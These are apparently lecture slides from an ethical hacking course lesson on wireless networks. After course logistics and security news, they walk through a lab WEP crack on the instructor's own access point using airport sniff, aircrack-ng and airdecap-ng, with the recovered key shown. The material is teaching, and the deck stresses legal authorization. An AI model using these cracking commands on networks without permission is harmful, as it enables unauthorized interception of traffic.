CIS 76 - Lesson 13

Rich's lesson module checklist

 Slides and lab posted
 WB converted from PowerPoint
 Print out agenda slide and annotate page numbers

 Flash cards
 Properties
 Page numbers
 1st minute quiz
 Web Calendar summary
 Web book pages
 Commands

 Project published

 Backup slides, whiteboard slides, CCC info, handouts on flash drive

 Spare 9v battery for mic
 Key card for classroom door

 Update CCC Confer and 3C Media portals

Last updated 11/21/2017

1
 CIS 76 - Lesson 13

Evading Network
TCP/IP
Devices
Cryptography Network and
Computer Attacks

Hacking Wireless Footprinting and

Networks
CIS 76 Social Engineering
Ethical Hacking
Hacking
Web Servers Port Scanning

Embedded Operating
Enumeration
Systems
Desktop and Server Scripting and
Vulnerabilities Programming

Student Learner Outcomes

1. Defend a computer and a LAN against a variety of different types of
security attacks using a number of hands-on techniques.

2. Defend a computer and a LAN against a variety of different types of

security attacks using a number of hands-on techniques. 2
 CIS 76 - Lesson 13

Introductions and Credits

Rich Simms
• HP Alumnus.
• Started teaching in 2008 when Jim Griffin went on
sabbatical.
• Rich’s site: http://simms-teach.com

And thanks to:

• Steven Bolt at for his WASTC EH training.
• Kevin Vaccaro for his CSSIA EH training and Netlab+ pods.
• EC-Council for their online self-paced CEH v9 course.
• Sam Bowne for his WASTC seminars, textbook recommendation and fantastic
EH website (https://samsclass.info/).
• Lisa Bock for her great lynda.com EH course.
• John Govsky for many teaching best practices: e.g. the First Minute quizzes,
the online forum, and the point grading system (http://teacherjohn.com/).
• Google for everything else!
3
 CIS 76 - Lesson 13

Student checklist for attending class

1. Browse to:
http://simms-teach.com
2. Click the CIS 76 link.
3. Click the Calendar link.
4. Locate today’s lesson.
5. Find the Presentation slides for
the lesson and download for
easier viewing.
6. Click the Enter virtual classroom
link to join CCC Confer.
7. Log into Opus-II with Putty or ssh
command.

Note: Blackboard Collaborate Launcher only

needs to be installed once. It has already
been downloaded and installed on the
classroom PC’s.

4
 CIS 76 - Lesson 13

Student checklist for suggested screen layout

 Google  CCC Confer  Downloaded PDF of Lesson Slides

 One or more login

 CIS 76 website Calendar page sessions to Opus-II
5
 CIS 76 - Lesson 13

Student checklist for sharing desktop with classmates

1) Instructor gives you sharing privileges.

2) Click overlapping rectangles

icon. If white "Start Sharing" text
is present then click it as well.

3) Click OK button.

4) Select "Share desktop"

and click Share button.
6
 CIS 76 - Lesson 13

Rich's CCC Confer checklist - setup

[ ] Preload White Board

[ ] Connect session to Teleconference

Session now connected

to teleconference

[ ] Is recording on?

Should change
Red dot means recording from phone
handset icon to
little Microphone
[ ] Use teleconferencing, not mic icon and the
Teleconferencing …
Should be grayed out message displayed

7
 CIS 76 - Lesson 13

Rich's CCC Confer checklist - screen layout

foxit for slides chrome

vSphere Client
putty

[ ] layout and share apps 8

 CIS 76 - Lesson 13

Rich's CCC Confer checklist - webcam setup

[ ] Video (webcam)
[ ] Make Video Follow Moderator Focus

9
 CIS 76 - Lesson 13

Rich's CCC Confer checklist - Elmo

The "rotate image"

button is necessary
if you use both the
side table and the
white board.

Quite interesting
that they consider
you to be an
Elmo rotated down to view side table
"expert" in order to
use this button!

Rotate
image
button Elmo rotated up to view white board

Rotate
image
button

Run and share the Image Mate

program just as you would any other
app with CCC Confer 10
 CIS 76 - Lesson 13

Rich's CCC Confer checklist - universal fixes

Universal Fix for CCC Confer:

1) Shrink (500 MB) and delete Java cache
2) Uninstall and reinstall latest Java runtime
3) http://www.cccconfer.org/support/technicalSupport.aspx

Control Panel (small icons) General Tab > Settings… 500MB cache size Delete these

Google Java download

11
CIS 76 - Lesson 13

Start
12
 CIS 76 - Lesson 13

Sound Check
Students that dial-in should mute their line
using *6 to prevent unintended noises
distracting the web conference.

Instructor can use *96 to mute all student lines.

Volume
*4 - increase conference volume.
*7 - decrease conference volume.
*5 - increase your voice volume.
*8 - decrease your voice volume.
13
 CIS 76 - Lesson 13

Instructor: Rich Simms

Dial-in: 888-886-3951
Passcode: 136690

Bruce Philip Sam B. Sam R. Miguel Bobby Garrett

May Chris Tanner Helen Xu Mariano Cameron

Tre Aga Ryan M. Karl-Heinz Remy Ryan A.

Email me ([email protected]) a relatively current photo of your face for 3 points extra credit
 CIS 76 - Lesson 13

First Minute Quiz

Please answer these questions in the order
shown:

For credit email answers to:

[email protected]
within the first few minutes of the live class
15
 CIS 76 - Lesson 13

Hacking Wireless Networks

Objectives Agenda
• Explain wireless technology • Quiz #10

• Describe wireless networking standards • Questions

• In the news
• Describe wireless authentication
• Best practices
• Use some wireless hacking tools
• Final project
• Housekeeping
• Wireless adapters and utilities
• Hacking WEP
• Hacking WPA/WPA2
• Assignment
• Wrap up

16
 CIS 76 - Lesson 13

Admonition

17
Shared from cis76-newModules.pptx
 CIS 76 - Lesson 13

Unauthorized hacking is a crime.

The hacking methods and activities

learned in this course can result in prison
terms, large fines and lawsuits if used in
an unethical manner. They may only be
used in a lawful manner on equipment you
own or where you have explicit permission
from the owner.

Students that engage in any unethical,

unauthorized or illegal hacking may be
dropped from the course and will receive
no legal protection or help from the
instructor or the college. 18
 CIS 76 - Lesson 13

Questions
19
 CIS 76 - Lesson 13

Questions
How this course works?

Past lesson material?

Previous labs?

他問一個問題，五分鐘是個傻子，他不問一個問題仍然是一個
Chinese 傻瓜永遠。
Proverb He who asks a question is a fool for five minutes; he who does not ask a question
remains a fool forever.
20
 CIS 76 - Lesson 13

Ryan Placeholder

"However, at the beginning of this next

weeks class I would gladly share any
knowledge/answer any questions people
have about web app vulns ...

... finding and exploiting XSS (DOM,

Stored, and Reflected), filter/WAF evasion,
and injection obfuscation"

21
 CIS 76 - Lesson 13

In the
news
22
 CIS 76 - Lesson 13

Older news

Fake google.com domain

http://thenextweb.com/google/2016/11/21/google-isnt-google/

http://mashable.com/2016/11/21/fake-google-domain

• Unicode Character 'LATIN LETTER SMALL CAPITAL G' (U+0262)

• ɢoogle.com redirects to xn--oogle-wmc.com which redirects to:

27
 CIS 76 - Lesson 13

Recent news

PoisonTap USB stick that installs backdoors on locked PCs and Macs
https://www.wired.com/2016/11/wickedly-clever-usb-stick-installs-backdoor-locked-
pcs/?mbid=social_twitter

http://arstechnica.com/security/2016/11/meet-poisontap-the-5-tool-that-ransacks-
password-protected-computers/

http://www.macrumors.com/2016/11/21/usb-device-hijacks-data-from-locked-macs/

• $5 Raspberry PI computer.
• Can be plugged into a locked or unlocked PC.
• Impersonates an Ethernet connection.
• Waits for a browser request then sends malicious code to the victim's browser cache.
• Created by Samy Kamkar who has released the schematics and code. 28
 CIS 76 - Lesson 13

Older news
https://samy.pl/poisontap/ https://github.com/samyk/poisontap

PoisonTap documentation and code

29
 CIS 76 - Lesson 13

Recent news
Security Breach and Spilled Secrets Have Shaken the N.S.A. to Its Core
By SCOTT SHANE, NICOLE PERLROTH and DAVID E. SANGER NOV. 12, 2017

https://www.nytimes.com/2017/11/12/us/nsa-
shadow-brokers.html

"Fifteen months into a wide-ranging investigation by the agency’s counterintelligence arm,

known as Q Group, and the F.B.I., officials still do not know whether the N.S.A. is the victim
of a brilliantly executed hack, with Russia as the most likely perpetrator, an insider’s leak, or
both."

"Compounding the pain for the N.S.A. is the attackers’ regular online public taunts, written in
ersatz broken English. Their posts are a peculiar mash-up of immaturity and sophistication,
laced with profane jokes but also savvy cultural and political references. They suggest that
their author — if not an American — knows the United States well."
30
 CIS 76 - Lesson 13

Older news

Your body reveals your password by interfering with Wi-Fi

http://www.theregister.co.uk/2016/11/13/researchers_point_finger_at_handy_smartphone_exploit/

• Analyzing the radio signal can reveal private information using a malicious
Wi-Fi hotspot.
• They claim 81.7% snooping success once the system has enough training
samples.
• Relies on beam-forming technology that does not work with only one
antenna.
• They worked out how user hand movements affect the signal.
• They do not need to compromise the target.
• Published in the ACM as "When CFI meets public WiFi".
31
 CIS 76 - Lesson 13

Recent news

Multi-stage malware sneaks into Google Play

BY LUKAS STEFANKO POSTED 15 NOV 2017
https://www.welivesecurity.com/2017/11/15/m
ulti-stage-malware-sneaks-google-play

"Another set of malicious apps has made it into the official Android app store.
Detected by ESET security systems as Android/TrojanDropper.Agent.BKY, these
apps form a new family of multi-stage Android malware, legitimate-looking and
with delayed onset of malicious activity."
32
 CIS 76 - Lesson 13

Recent news

Hackers Poison Google Search Results to Deliver Zeus Panda

BY Kelly Sheridan 11/3/2017
https://www.darkreading.com/vulnerabilities---
threats/hackers-poison-google-search-results-to-
deliver-zeus-panda/d/d-id/1330322

"Most people use Google to search for answers but don't know the results aren't always
safe. Attackers have begun to exploit this reliance on Google by using Search Engine
Optimization (SEO) to populate search results with malicious links and distribute the Zeus
Panda Banking Trojan through a compromised Word document."\

"This malware first queries the system's keyboard mapping to determine its language,
and terminates if it detects Russian, Belarusian, Kazak, or Ukrainian. Earlier analysis of
Zeus Panda also revealed it wouldn't run on systems in Russia, Ukraine, Belarus, or
Kazakhstan."

33
 CIS 76 - Lesson 13

Recent news
ProPublica Newsletter
BY Julia Angwin August 2017

http://go.propublica.org/webmail/125411/1547
92457/ecdf767a701bd0622a1a989e0c25fb1491a
030779e2eecdb862fef7b6fb29017

"You write a provocative tweet and
an army of Twitter bots heaps abuse
on you. You write a Facebook post
commenting on a news item and it is
reported as hateful and deleted by
Facebook."
"After publishing a story about the tech
providers that enable hate websites last
weekend, my inbox was flooded with
notifications that I had been signed up for
email newsletters and user accounts on
random websites:"

34
 CIS 76 - Lesson 13

Recent news
Hackers Shut Down ProPublica’s Email For a Day. Here’s How to
Stop Attacks Like That.
BY Julia Angwin November 13, 2017

https://www.propublica.org/article/hackers-
shut-down-propublicas-email-for-a-day-heres-
how-to-stop-attacks-like-that

"In August, my email was attacked. Hate groups overwhelmed my inbox and
the inboxes of two of my colleagues, and shut down ProPublica’s email much
of the day. (I wrote about this incident in a previous newsletter.)

1. The Messaging Malware Mobile Anti-Abuse Working Group (M3AAWG) has

asked bulk email senders to identify subscription confirmation emails with a
special technical header.

2. Do you run a website or a newsletter or some sort of listserv? Is CAPTCHA

turned on? Turn it on.

3. Do you sign up for newsletters or listservs? Do the newsletters or listservs you

sign up for have CAPTCHAs? If not, that could be a problem. Reach out to them
and encourage them to implement CAPTCHAs, or the technical header, or both.

4. If you have a WordPress site, you can turn off user registrations — if unneeded.
You can also install a CAPTCHA on your sign-up form. 35
 CIS 76 - Lesson 13

Best
Practices
36
 CIS 76 - Lesson 13

Distributed Denial of Service Attacks:

Four Best Practices for Prevention and Response

• Locate servers in different data centers.

• Ensure that data centers are located on different networks.
• Ensure that data centers have diverse paths.
• Ensure that the data centers, or the networks that the data
centers are connected to, have no notable bottlenecks or
single points of failure.

https://insights.sei.cmu.edu/sei_blog/2016/11/distributed-denial-of-
service-attacks-four-best-practices-for-prevention-and-response.html

37
 CIS 76 - Lesson 13

Simple Banking Security Tip: Verbal Passwords

https://krebsonsecurity.com/2017/11/simple-banking-security-tip-
verbal-passwords/

"Most financial institutions will let customers add verbal passwords

or personal identification numbers (PINs) that are separate from
any other PIN or online banking password you might use,
although few will advertise this."

"Ultimately, I ended up moving our investments to an institution

that consistently adhered to my requirements. Namely, that
failing to provide the pass phrase required an in-person visit to a
bank branch to continue the transaction, at which time ID would
be requested. "
38
 CIS 76 - Lesson 13

Final Project

39
 CIS 76 - Lesson 13

CIS 76 Project

The final project is available.

Due in two weeks.

Calendar Page

https://simms-
teach.com/cis76calendar.php

https://simms-
teach.com/docs/cis76/cis76final-project.pdf
40
 CIS 76 - Lesson 13

CIS 76 Project

Links to Project document,

Test matrix, and online
directory for students to share
their projects from.

And again ...

Due 12/5

41
https://simms-teach.com/cis76calendar.php
 CIS 76 - Lesson 13

CIS 76 Project

Remember late work is not accepted. If you run out of time submit what you have
completed for partial credit.

Excerpt from the Project document 42

 CIS 76 - Lesson 13

CIS 76 Project
Use this directory to share your project with other classmates
Calendar Page

https://simms-
teach.com/cis76calendar.php

https://cabrillo.instructure.com/courses/7125/pages/cis-76-project-folder

43
 CIS 76 - Lesson 13

CIS 76 Project

Calendar Page Use this spreadsheet to sign up to test a classmate's project

https://simms-
teach.com/cis76calendar.php

https://cabrillo.instructure.com/courses/7125/pages/cis-76-project-testing-
signup-sheet

44
 CIS 76 - Lesson 13

CIS 76 Project

Use this template to test

another student's project

45
https://simms-teach.com/docs/cis76/cis76final-project-test-report.pdf
 CIS 76 - Lesson 13

CIS 76 Project

What takes longer?

Creating the hacking project lab?

Or deciding what to project to do?

46
 CIS 76 - Lesson 13

CIS 76 Project

Some Hacking Project Ideas

github projects Google searches CVE Details

https://github.com/Hack-
with-Github/Awesome-
hacking tutorials Find vulnerabilities with
Hacking Metasploit modules
hacking projects
https://www.cvedetails.com/
metasploit tutorials

kali hacking tutorials

News
EH-OWASP-XX VM
ethical hacking tips
Articles on security,
Chuck full of project ideas
... cybersecurity and hacking

Pick a project you can build in your CIS 76 EH pod 47

 CIS 76 - Lesson 13

CIS 76 Project

And don't forget:

Unauthorized hacking is a crime.

The hacking methods and activities learned in this

course can result in prison terms, large fines and
lawsuits if used in an unethical manner. They may
only be used in a lawful manner on equipment you
own or where you have explicit permission from
the owner.

Students that engage in any unethical,

unauthorized or illegal hacking may be dropped
from the course and will receive no legal protection
or help from the instructor or the college.
48
 CIS 76 - Lesson 13

Housekeeping

49
 CIS 76 - Lesson 13

Housekeeping

1. Lab 10 due 11:59PM tonight.

2. There are eight extra credit labs

available now, six points each, due the
day of the final exam.

Tue

3. The final project is available now and

due in two weeks. 50
 CIS 76 - Lesson 13

Next Week Guest Speakers

1. Denise Moss - Federal Apprenticeship/On-the-

job-training grant and Cabrillo College
participation

2. Jesse Warren - Leveraging Twitter To

Manipulate Social Views

51
 CIS 76 - Lesson 13

https://www.youtube.com/watch?v=357GquKbofk

Rich: Looks like fun. I just watched the video and Dan indicated it was only open to County employees.
Would our students have his authorization to participate? They all took the "Hacking without permission is a
crime" oath at the start of class :)

Tess: Oh yes! I checked with Dan before I sent you the email. He is looking forward to all attempts. :)
52
 CIS 76 - Lesson 13

Heads up on Final Exam

Test #3 (final exam) is TUESDAY Dec 12 4-6:50PM

Extra credit
labs and
final posts
Tue due by
11:59PM

• All students will take the test at the same time. The test must be
completed by 6:50PM.

• Working and long distance students can take the test online via
CCC Confer and Canvas.

• Working students will need to plan ahead to arrange time off from
work for the test.
53
• Test #3 is mandatory (even if you have all the points you want)
CIS 76 - Lesson 13

54
 CIS 76 - Lesson 13
Where to find your grades
Send me your survey to get your LOR code name.

The CIS 76 website Grades page Or check on Opus-II

http://simms-teach.com/cis76grades.php
checkgrades codename
(where codename is your LOR codename)

Written by Jesse Warren a past CIS 90 Alumnus

To run checkgrades update your path in .bash_profile with:

PATH=$PATH:/home/cis76/bin

Points that could have been earned:

9 quizzes: 27 points
9 labs: 270 points
2 tests: 60 points
3 forum quarters: 60 points
Total: 417 points
At the end of the term I'll add up all
your points and assign you a grade 55
using this table
 CIS 76 - Lesson 13

Wireless
Overview
60
 CIS 76 - Lesson 13

The World of Wireless Technology

• Cell phones
• Cordless phones
• Smart phones
• Pagers
• Smart watches
• GPS
• Remote controls
• Garage door openers
• Car door openers
• Two-way radios
• Wireless laptops
• Tablets
• WiFi cams
• Fitbits
• And many more ...
61
 CIS 76 - Lesson 13

Access Points
Devices with wireless
network adapters
• Usually connected to a wired network configured to the SSID
of the access point.

Station

Station
Wired LAN Access Point

The SSID (Service Set Identifier) is

used to identify the wireless network Station
and configured on the access point.

62
 CIS 76 - Lesson 13

http://www.l-com.com/content/802.11-Wireless-Standards.pdf 63
 CIS 76 - Lesson 13

CEH Website Assessment Question

Which wireless standard has bandwidth up to 54

Mbps and signals in a regulated frequency spectrum
around 5 GHz?

1. 802.11a
2. 802.11b
3. 802.11g
4. 802.11i

https://www.eccouncil.org/programs/certified-ethical-hacker-
ceh/ceh-assessment/

Put your answer in the chat window

64
CIS 76 - Lesson 13

65
Professor Messer

CIS 76 - Lesson 13

Wireless Security using WEP, WPA and WPA2

Professor Messer

https://www.youtube.com/watch?v=DspgyuedICM

Great overview of the three methods of securing wireless 66

CIS 76 - Lesson 13

WIGLE.NET
Access Points on Google Maps

https://wigle.net/ 67
 CIS 76 - Lesson 13

WIGLE.NET
Zooming in to see specific SSID's

https://wigle.net/ 68
 CIS 76 - Lesson 13

WIGLE.NET
Full screen view of Wi-Fi Encryption Over Time

https://wigle.net/ 69
 CIS 76 - Lesson 13

CEH Website Assessment Question

Which of the following WiFi discovery methods refers

to drawing symbols in public places to advertise open
WiFi networks?

1. WarWalking
2. WarFlying
3. WarChalking
4. WarDriving

https://www.eccouncil.org/programs/certified-ethical-hacker-
ceh/ceh-assessment/

Put your answer in the chat window

70
CIS 76 - Lesson 13

71
 CIS 76 - Lesson 13

Special
Adapters and
Utilities for Pen
Testing
72
 CIS 76 - Lesson 13

For this lesson I used:

• A MacBook Pro with MacPorts and Aircrack-NG.

+ +
+
https://www.macports.org/ http://www.aircrack-ng.org/

Enables easy installation WiFi pen-testing tools

of open source software
on Macs

• The EH-Kali-xx VM in the EH Pod (Aircrack-NG already installed).

73
 CIS 76 - Lesson 13

What Makes a Kali Linux USB

Adapter Compatible?

To do wireless Penetration Testing a

card must be able to go into monitor
mode and do packet injections most
cards can't do this.

There are known chipsets that will

work with Kali and Pen testing.

Most Popular Kali Linux Chipsets.

Atheros AR9271
Ralink RT3070
Ralink RT3572

http://www.wirelesshack.org/best-kali-
linux-compatible-usb-adapter-dongles-
2016.html 74
 CIS 76 - Lesson 13

Hak5 Gear and Tutorials

https://www.hak5.org/shows

https://www.wifipineapple.com/ 75
 CIS 76 - Lesson 13

Android WiFi
Analyzer

76
 CIS 76 - Lesson 13

Android WiFi Analyzer

Shows frequency spectrum of local WiFi networks

77
 CIS 76 - Lesson 13

Android WiFi Analyzer

Shows strength over time of local WiFi networks

78
 CIS 76 - Lesson 13

Android WiFi Analyzer

Shows signal strength of a local WiFi network

79
 CIS 76 - Lesson 13

Android WiFi Analyzer

Shows local WiFi network channels

80
 CIS 76 - Lesson 13

Android WiFi Analyzer

Shows local access points 81

 CIS 76 - Lesson 13

Wireless
Notes

82
 CIS 76 - Lesson 13

Monitoring Network Traffic

Wired - use Promiscuous Mode - When a wired adapter is in

promiscuous mode it will listen to all packets on the wire. Normally a
wired adapter discards any unicast frames destined to a MAC address
other than its own.

Wireless - use Monitor Mode - a capability in some wireless

adapters to monitor 802.11 radio traffic frames for all networks. This
is completely passive because there is no need to associate (connect)
to a wireless network.

83
 CIS 76 - Lesson 13

Wireshark on Kali PC (not VM)

wlan0 is the built-in wireless adapter (Intel Corporation PRO/Wireless

3945ABG [Golan]) on the Kali PC 84
 CIS 76 - Lesson 13

Wireshark on Kali PC (not VM)

Wireshark shows traffic on the connected WiFi network destined for the Kali PC
85
 CIS 76 - Lesson 13

Wireshark on Kali PC (not VM)

airmon-ng
airmon-ng start wlan1
airmon-ng

Puts wlan1 (Alfa AWUS051NH) into monitor mode

86
 CIS 76 - Lesson 13

Wireshark on Kali PC (not VM)

wlan1 is the USB connected Alfa AWUS051NH adapter on the Kali PC 87

 CIS 76 - Lesson 13

Wireshark on Kali PC (not VM)

Wireshark shows all 802.11 traffic for all WiFi networks 88

 CIS 76 - Lesson 13

Handy wireless commands

Mac Windows Kali

Show interfaces ifconfig ipconfig ifconfig
ip addr
Show WiFi airport -I iwconfig

Show WiFi networks airport -s airodump-ng wlan0

Show WiFi adapters airmon-ng

89
 CIS 76 - Lesson 13

Hacking
WEP
90
 CIS 76 - Lesson 13

Wired Equivalent Privacy (WEP)

• Defined in the 802.11b standard.

• Encrypts data on a wireless network.
• Uses the insecure RC4 stream cipher.
• WEP can be cracked in minutes.

91
 CIS 76 - Lesson 13

WEP Cracking Theory

Ryan Riley

Ryan Riley had created

an excellent video on
how WEP and WEP
cracking works.

If you get a chance

watch the whole video.
We will just look at a
portion tonight.

He has lots of other

excellent security
videos as well.

https://www.youtube.com/watch?v=XoS_GIOLzCo

Start at 02:41... stop at 10:30 92

 CIS 76 - Lesson 13

WEP Cracking Setup

BSSID STA
= Basic Service Set Identifier = Station
= AP Mac Address = MacBook Pro
= 00:06:25:4b:21:b4

Attacker

Linksys
WAP54G STA
= Station
= Win 10 PC
SSID
= Service Set Identifier Victim
= Name of the network
= linkysys
93
 CIS 76 - Lesson 13

Linksys WAP54G Configuration

For this example we will use WEP (Wired Equivalent Privacy)

94
 CIS 76 - Lesson 13

Linksys WAP54G Configuration

Using Mixed Mode (B and G), Channel 5, and Wireless Security (WEP) 95
 CIS 76 - Lesson 13

Linksys WAP54G Configuration

Generate a key from a pass phrase and use Key 1 on each station 96
 CIS 76 - Lesson 13

Windows 10 PC View

SSID: linkysys
Protocol: 802.11g
Security type: Open
Network band: 2.4 GHz
Network channel: 5
IPv4 address: 192.168.88.112
Manufacturer: Intel Corporation
Description: Intel(R) Centrino(R) Wireless-N 1030
Driver version: 15.11.0.7
Physical address (MAC): 4C-EB-42-85-71-B8

Connected to the linkysys SSID network 97

 CIS 76 - Lesson 13

Windows 10 PC View

Watching an Office episode on Netflix so we have some encrypted packets to sniff.

98
 CIS 76 - Lesson 13

Monitoring WiFi networks with MacBook Pro

airport -s
Richards-MBP:~ rsimms$ airport -s
SSID BSSID RSSI CHANNEL HT CC SECURITY
(auth/unicast/group)
BenjiNet_5G 2c:56:dc:85:3e:ec -52 149 Y -- WPA2(PSK/AES/AES)
Linksys 90:72:40:0d:50:1e -87 6 Y US WPA2(PSK/AES/AES)
DIRECT-F0-HP ENVY 7640 series a0:8c:fd:72:68:f1 -74 6 Y -- WPA2(PSK/AES/AES)
ATT288 3c:36:e4:22:95:80 -68 1 Y --
WPA(PSK/AES,TKIP/TKIP) WPA2(PSK/AES,TKIP/TKIP)
uLab-WiFiNet 4c:5e:0c:ca:25:c0 -51 1,+1 Y -- WPA2(PSK/AES/AES)
linkysys 00:06:25:4b:21:b4 -47 5 N -- WEP
BenjiNet 2c:56:dc:85:3e:e8 -47 8 Y -- WPA2(PSK/AES/AES)
Richards-MBP:~ rsimms$

The linkysys SSID on channel 5

is using WEP (not secure)

On a MacBook Pro, the built in airport command with an -s option will scan
all available WiFi networks.

99
 CIS 76 - Lesson 13

Capturing Packets using MacBook Pro

airport en0 sniff 5
Richards-MBP:~ rsimms$ airport en0 sniff 5
Capturing 802.11 frames on en0.
^CSession saved to /tmp/airportSniffdZH641.cap.
Richards-MBP:~ rsimms$

Let's start sniffing the channel 5 used by the access point for the SSID linkysys. Use
control-C to stop the capture.

ls -lth /private/tmp/airportSniff*.cap
Richards-MacBook-Pro:~ rsimms$ ls -lth
-rw-r--r-- 1 rsimms wheel 39M Nov
-rw-r--r-- 1 rsimms wheel 69M Nov
-rw-r--r-- 1 rsimms wheel 108M Nov
-rw-r--r-- 1 rsimms wheel 23M Nov
-rw-r--r-- 1 rsimms wheel 4.4M Nov
-rw-r--r-- 1 rsimms wheel 497K Nov
-rw-r--r-- 1 rsimms wheel 990K Nov
-rw-r--r-- 1 rsimms wheel 2.4M Nov
-rw-r--r-- 1 rsimms wheel 1.5M Nov
Richards-MacBook-Pro:~ rsimms$
/private/tmp/airportSniff*.cap
21 08:41 /private/tmp/airportSniffdZH641.cap
21 08:26 /private/tmp/airportSniff8FkDVL.cap
20 20:36 /private/tmp/airportSniffk44M58.cap
20 19:39 /private/tmp/airportSniffKzpvq8.cap
20 19:16 /private/tmp/airportSniffFVOuaV.cap
20 16:22 /private/tmp/airportSniffh69ghh.cap
20 16:14 /private/tmp/airportSniffdLJDh2.cap
20 16:05 /private/tmp/airportSniffIhmspR.cap
20 14:28 /private/tmp/airportSniffA8hduu.cap

The packets are captured and dumped into a new file in the /private/tmp
directory with any previous captures. 100
 CIS 76 - Lesson 13

WEP Cracking using MacBook Pro

aircrack-ng -b 00:06:25:4b:21:b4 /private/tmp/airportSniffdZH641.cap
Richards-MacBook-Pro:~ rsimms$ aircrack-ng -b 00:06:25:4b:21:b4 /private/tmp/airportSniffdZH641.cap
Opening /private/tmp/airportSniffdZH641.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 34953 ivs.

Aircrack-ng 1.2 rc3

[00:00:01] Tested 553015 keys (got 145 IVs)

KB depth byte(vote)
0 32/120 12( 256) B1( 256) B2( 256) B3( 256) 03( 256) B5( 256) 63( 256) 64( 256) B8( 256) 39( 256)
1 26/ 1 C1( 512) 40( 256) 02( 256) 03( 256) 05( 256) 07( 256) 09( 256) 0B( 256) 0E( 256) 0F( 256)
2 5/ 6 AC( 768) 5C( 512) C8( 512) 40( 512) 31( 512) 2F( 512) BE( 512) FD( 512) BD( 512) E1( 512)
3 28/ 3 A6( 512) 23( 256) 6A( 256) 6B( 256) BE( 256) BF( 256) 3C( 256) 6E( 256) 6F( 256) 24( 256)
4 5/ 31 C0( 768) 24( 512) E8( 512) 2A( 512) 1B( 512) BA( 512) A3( 512) A0( 512) F0( 512) 81( 512)

KEY FOUND! [ BE:EF:BE:EF:22 ]

Not yet ....
Decrypted correctly: 100%we will do this in our pod instead

Richards-MacBook-Pro:~ rsimms$

You could just crack the WEP password on the MAC. Instead we will transfer
the packet capture file to the EH-Pod and crack on the EH-Kali VM

101
 CIS 76 - Lesson 13

Capture file
transferred
to Kali
102
 CIS 76 - Lesson 13

WEP Cracking

scp [email protected]:../depot/lesson13/* .
root@eh-kali-05:~# scp [email protected]:../depot/lesson13/* .
[email protected]'s password:
airportSniffdZH641.cap 100% 39MB 38.5MB/s 00:01
airportSniffENFGOR.cap 100% 6548KB 6.4MB/s 00:00
airportSniffyG7m8J.cap 100% 3023KB 3.0MB/s 00:00
root@eh-kali-05:~#

Copying the packet capture files to the EH-Kali-XX VM

103
 CIS 76 - Lesson 13

Capture
dZH641

Crack WEP password

104
 CIS 76 - Lesson 13

airportSniffdZH641.cap

This capture was done while watching a portion of an Office episode on Netflix

105
 CIS 76 - Lesson 13

WEP Cracking

ls -l airportSniffdZH641.cap
root@eh-kali-05:~# ls -l airportSniffdZH641.cap
-rw-r--r-- 1 root root 40401050 Nov 21 12:31 airportSniffdZH641.cap
root@eh-kali-05:~#

file airportSniffdZH641.cap
root@eh-kali-05:~# file airportSniffdZH641.cap
airportSniffdZH641.cap: tcpdump capture file (little-endian) - version 2.4 (802.11
with radiotap header, capture length 2147483647)
root@eh-kali-05:~#

airportSniffdZH641.cap contains the channel 5 packets

captured on the Macbook Pro.
106
 CIS 76 - Lesson 13

WEP Cracking
[EH-Kali-xx] Wireshark

107
We can see one of the beacon frames from the Linksys WAP54G (SSID=linkysys)
 CIS 76 - Lesson 13

WEP Cracking
[EH-Kali-xx] Wireshark

4 5

2 To see only Beacon frames:

3 1. Select any Beacon frame
2. Expand the IEEE 802.11 Beacon
frame layer
3. Right-click on "Type/Subtype:
Beacon frame
4. Select "Apply as filter"
5. Select "Selected"

108
Creating a filter to show only beacon frames
 CIS 76 - Lesson 13

Activity

As root, on your EH-Kali-XX VM:

1) scp [email protected]:../depot/lesson13/* .

2) Run wireshark and examine at the airportSniffdZH641.cap file.

3) Apply a filter to show only beacon frames.

4) What other SSID's can you discover in this capture?

Write your SSID's in the chat window

109
 CIS 76 - Lesson 13

aircrack-ng airportSniffdZH641.cap

Using aircrack-ng to crack the WEP password 110

 CIS 76 - Lesson 13

Activity

As root, on your EH-Kali-XX VM:

1. If you haven't already:

scp [email protected]:../depot/lesson13/* .

2. aircrack-ng airportSniffdZH641.cap

3. Enter the # number of the "Linkysys" SSID

The one with the "y"

(not Linksys)

4. "KEY FOUND!" shows is the cracked WEP password

What is the WEP password? Write your answer in the chat window
111
 CIS 76 - Lesson 13

112
We have the password now so next we will attempt to extract files from the traffic
 CIS 76 - Lesson 13

Capture
ENFGOR

Exfiltrating Files
113
 CIS 76 - Lesson 13

airportSniffENFGOR.cap

http://www.bbc.com/news/world-europe-38054216

https://simms-teach.com/docs/cis76/cis76lab01.pdf
114
 CIS 76 - Lesson 13

Getting files from packet captures

ls -l airportSniffENFGOR.cap
root@eh-kali-05:~# ls -l airportSniffENFGOR.cap
-rw-r--r-- 1 root root 6704919 Nov 21 12:31 airportSniffENFGOR.cap

file airportSniffENFGOR.cap
root@eh-kali-05:~# file airportSniffENFGOR.cap
airportSniffENFGOR.cap: tcpdump capture file (little-endian) - version 2.4 (802.11 with
radiotap header, capture length 2147483647)
root@eh-kali-05:~#

Another file of encrypted WEP packets captured on

the Macbook Pro and transferred to the EH-Kali VM

115
 CIS 76 - Lesson 13

Getting files from packet captures

wireshark airportSniffENFGOR.cap

116
We can see the 802.11 frames but all data is encrypted
 CIS 76 - Lesson 13

Getting files from packet captures

airdecap-ng -w BEEFBEEF22 airportSniffENFGOR.cap

